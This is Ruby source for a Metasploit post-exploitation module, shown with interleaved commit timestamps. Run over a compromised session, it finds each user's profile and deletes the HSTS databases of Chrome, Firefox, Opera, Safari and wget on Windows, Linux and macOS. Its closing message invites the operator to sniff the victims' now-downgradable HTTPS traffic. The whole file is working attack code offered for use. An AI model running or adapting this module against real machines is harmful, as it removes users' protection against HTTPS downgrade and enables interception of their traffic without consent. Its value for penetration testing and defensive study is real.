2018-01-22 21:53:16 +00:00
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf :: Post
include Msf :: Post :: File
include Msf :: Post :: Windows :: UserProfiles
include Msf :: Post :: OSX :: System
include Msf :: Post :: Unix
def initialize ( info = { } )
super ( update_info ( info ,
'Name' = > 'Web browsers HSTS entries eraser' ,
'Description' = > %q{
2018-02-03 05:18:30 +00:00
This module removes the HSTS database of the following tools and web browsers : Mozilla Firefox ,
Google Chrome , Opera , Safari and wget .
2018-01-22 21:53:16 +00:00
} ,
'License' = > MSF_LICENSE ,
'Author' = >
[
'Sheila A. Berta (UnaPibaGeek)' , # ElevenPaths
] ,
'Platform' = > %w( linux osx unix win ) ,
2018-02-03 05:18:30 +00:00
'Arch' = > [ ARCH_X86 , ARCH_X64 ] ,
2018-01-22 21:53:16 +00:00
'References' = >
[
[ 'URL' , 'http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html' ] ,
[ 'URL' , 'https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf' ]
] ,
'SessionTypes' = > %w( meterpreter shell )
) )
2018-02-03 05:18:30 +00:00
register_options ( [
OptBool . new ( 'DISCLAIMER' ,
[ true , 'This module will delete HSTS data from the target. Set this parameter to True in order to accept this warning.' , false ] )
] )
2018-01-22 21:53:16 +00:00
end
def run
2018-02-03 05:18:30 +00:00
unless ( datastore [ 'DISCLAIMER' ] == true )
print_error ( " This module will delete HSTS data from all browsers on the target. You must set the DISCLAIMER option to True to acknowledge that you understand this warning. " )
return
end
2018-01-22 21:53:16 +00:00
profiles = user_profiles
profiles . each do | user_profile |
account = user_profile [ 'UserName' ]
browsers_hsts_db_path = { }
case session . platform
when 'windows'
browsers_hsts_db_path = {
'Chrome' = > " #{ user_profile [ 'LocalAppData' ] } \\ Google \\ Chrome \\ User Data \\ Default \\ TransportSecurity " ,
'Firefox' = > " #{ user_profile [ 'AppData' ] } \\ Mozilla \\ Firefox \\ Profiles " , #Just path for now
'Opera' = > " #{ user_profile [ 'AppData' ] } \\ Opera Software \\ Opera Stable \\ TransportSecurity "
}
when 'unix' , 'linux'
browsers_hsts_db_path = {
'Chrome' = > " #{ user_profile [ 'LocalAppData' ] } /.config/google-chrome/Default/TransportSecurity " ,
'Firefox' = > " #{ user_profile [ 'LocalAppData' ] } /.mozilla/firefox " , #Just path for now
2018-02-03 05:18:30 +00:00
'Opera' = > " #{ user_profile [ 'LocalAppData' ] } /.config/opera/TransportSecurity " ,
'wget' = > " #{ user_profile [ 'LocalAppData' ] } /.wget-hsts "
2018-01-22 21:53:16 +00:00
}
when 'osx'
browsers_hsts_db_path = {
'Chrome' = > " #{ user_profile [ 'LocalAppData' ] } /Google/Chrome/Default/TransportSecurity " ,
'Firefox' = > " #{ user_profile [ 'LocalAppData' ] } /Firefox/Profiles " , #Just path for now
'Opera' = > " #{ user_profile [ 'LocalAppData' ] } /com.operasoftware.Opera/TransportSecurity " ,
'Safari' = > " #{ user_profile [ 'AppData' ] } /Cookies/HSTS.plist "
}
else
print_error " Platform not recognized: #{ session . platform } "
end
browsers_hsts_db_path . each_pair do | browser , path |
if browser == 'Firefox'
hsts_db_path = [ ]
if directory? ( path )
files = dir ( path )
files . reject! { | file | %w( . .. ) . include? ( file ) }
files . each do | file_path |
hsts_db_path . push ( [ path , file_path , 'SiteSecurityServiceState.txt' ] . join ( system_separator ) ) if file_path . match ( / .* \ .default / )
end
end
path = hsts_db_path [ 0 ]
end
if ! path . nil? and file? ( path )
print_status " Removing #{ browser } HSTS database for #{ account } ... "
file_rm ( path )
end
end
end
print_status " HSTS databases removed! Now enjoy your favorite sniffer! ;-) "
end
def user_profiles
user_profiles = [ ]
case session . platform
when / unix|linux /
user_names = dir ( " /home " )
user_names . reject! { | u | %w( . .. ) . include? ( u ) }
user_names . each do | user_name |
user_profiles . push ( 'UserName' = > user_name , " LocalAppData " = > " /home/ #{ user_name } " )
end
when / osx /
user_names = session . shell_command ( " ls /Users " ) . split
user_names . reject! { | u | u == 'Shared' }
user_names . each do | user_name |
user_profiles . push (
'UserName' = > user_name ,
" AppData " = > " /Users/ #{ user_name } /Library " ,
" LocalAppData " = > " /Users/ #{ user_name } /Library/Application Support "
)
end
when / windows /
user_profiles |= grab_user_profiles
else
print_error " Error getting user profile data! "
end
user_profiles
end
def system_separator
return session . platform == 'windows' ? '\\' : '/'
end
2018-02-03 05:18:30 +00:00
end
